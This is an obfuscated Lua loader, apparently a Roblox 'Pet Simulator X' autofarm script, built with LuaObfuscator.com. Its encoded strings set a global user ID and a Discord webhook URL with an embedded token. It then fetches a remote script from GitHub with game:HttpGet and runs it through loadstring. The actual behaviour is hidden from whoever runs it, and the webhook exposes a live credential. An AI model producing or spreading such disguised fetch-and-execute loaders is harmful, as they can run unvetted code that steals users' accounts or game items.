--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((4 -2)^(v32-1)))%((2 + 0)^(((v33-(281 -(119 + 161))) -(v32-((4 -3) + 0))) + ((1 + 0) -0)));return v76-(v76%(1860 -(878 + 981)));else local v77=(2 -0)^(v32-((1080 + 796) -(414 + 1461)));return (((v31%(v77 + v77))>=v77) and (3 -2)) or (0 + 0);end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + (1295 -(1020 + 273)));v18=v18 + (298 -(295 + 1));return (v40 * (132 + 124)) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (1297 -(1286 + 8)));v18=v18 + (522 -(85 + 433));return (v44 * (11790063 + 4987153)) + (v43 * (67044 -(668 + 273 + 567))) + (v42 * (677 -421)) + v41;end local function v24()local v45=v23();local v46=v23();local v47=2 -1;local v48=(v20(v46,1676 -(179 + 1496),37 -17) * (((2140 -1686) -((2310 -(1021 + 975)) + 138))^(29 + 3))) + v45;local v49=v20(v46,19 + 2,1834 -(65 + 1738));local v50=((v20(v46,121 -(79 + 10))==(1419 -(1137 + 281))) and  -(1 + 0)) or (1 + 0);if (v49==(1439 -(695 + 744))) then if (v48==0) then return v50 * (0 + (0 -0));else v49=1;v47=1355 -(1226 + 129);end elseif (v49==(818 + 1229)) then return ((v48==0) and (v50 * ((1 -0)/0))) or (v50 * NaN);end return v8(v50,v49-(1815 -792)) * (v47 + (v48/((4 -2)^(1576 -(4 + 1520)))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==(1466 -(283 + 1183))) then return "";end end v51=v3(v16,v18,(v18 + v34) -(1238 -(894 + 343)));v18=v18 + v34;local v52={};for v63=1 -0, #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=1,v57 do local v66=v21();local v67;if (v66==1) then v67=v21()~=(0 -0);elseif (v66==(1360 -(1352 + 6))) then v67=v24();elseif (v66==3) then v67=v25();end v58[v65]=v67;end v56[3 + 0]=v21();for v69=1,v23() do local v70=v21();if (v20(v70,1,2 -1)~=0) then else local v83=v20(v70,2,3 + 0);local v84=v20(v70,4,6);local v85={v22(),v22(),nil,nil};if (v83==(0 -0)) then v85[1245 -(341 + 901)]=v22();v85[4]=v22();elseif (v83==(1476 -(639 + 836))) then v85[2 + 1]=v23();elseif (v83==2) then v85[3]=v23() -((1 + 1)^16);elseif (v83~=(2 + 1)) then else v85[3 + 0]=v23() -(2^16);v85[4]=v22();end if (v20(v84,1,1)==(1487 -(1187 + 299))) then v85[4 -2]=v58[v85[3 -1]];end if (v20(v84,2 + 0,2)==1) then v85[104 -(91 + 10)]=v58[v85[3]];end if (v20(v84,1331 -(458 + 870),1997 -(1176 + 818))==(1 -0)) then v85[5 -1]=v58[v85[2 + 2]];end v53[v69]=v85;end end for v71=1,v23() do v54[v71-(1 + 0)]=v28();end for v73=668 -(104 + 563),v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=369 -(327 + 42),v81 do if ((2104<(6000 -(339 + 1045))) and (v107>=v90)) then v92[v107-v90]=v80[v107 + ((4670 -2937) -(652 + 368 + 712))];else v94[v107]=v80[v107 + 1 + 0];end end local v95=(v81-v90) + 1 + 0;local v96;local v97;while true do v96=v88[v78];v97=v96[1101 -((1351 -(796 + 223)) + 768)];if ((v97<=(3 -0)) or ((4327 -2148)==(20468 -16093))) then if ((979>=(182 + 12)) and (v97<=(1457 -(193 + 760 + 503)))) then if ((v97==(0 -0)) or ((406 -(17 + 206 + 21))>=(3476 -2288))) then local v118=v96[2];local v119=v94[v96[3 -0]];v94[v118 + 1]=v119;v94[v118]=v119[v96[4]];else v94[v96[2 + 0]]();end elseif ((v97>(807 -(122 + (909 -(141 + 85))))) or (4844<=(530 + 2425))) then v94[v96[2 + 0]][v96[12 -9]]=v96[10 -6];else v94[v96[1590 -((1289 -(179 + 46)) + 524)]][v96[1 + 2]]=v94[v96[8 -4]];end elseif ((2216<=(13523 -8568)) and (v97<=(1 + 4))) then if ((v97==(7 -3)) or ((2415 + 786)<(429 + 62))) then v94[v96[1 + 1]]=v96[3 + 0];else do return;end end elseif ((v97<=(1759 -(1719 + 34))) or (3254<=(2428 -(1139 + 112 + 278)))) then v94[v96[5 -(1 + 2)]]=v37[v96[401 -(310 + 88)]];elseif ((v97>(1 + 2 + 4)) or ((18972 -14682)<((576 + 2116) -((2972 -2139) + 64)))) then local v131=v96[1303 -(709 + 592)];v94[v131]=v94[v131](v13(v94,v131 + (3 -2),v79));else local v133=v96[2 -0];local v134,v135=v91(v94[v133](v13(v94,v133 + (2 -1),v96[3 -0])));v79=(v135 + v133) -(94 -(78 + 15));local v136=0;for v137=v133,v79 do v136=v136 + 1;v94[v137]=v134[v136];end end v78=v78 + 1 + 0;end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703063O0055736572494403083O00456479312O32393503073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130353239343932312O32312O3734393637362F522O475A4D426D7965644E734C42522D6466536766732D622O667534787A6658386D6451486D54465165745A6B5361764D4F77664A57306241444B626568657756476945030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C7561000D3O0012063O00013O001206000100033O0010023O000200010012063O00013O0030033O000400050012063O00063O001206000100073O00202O000100010008001204000300094O0007000100034O00085O00022O00013O000100012O00053O00017O000D3O00023O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
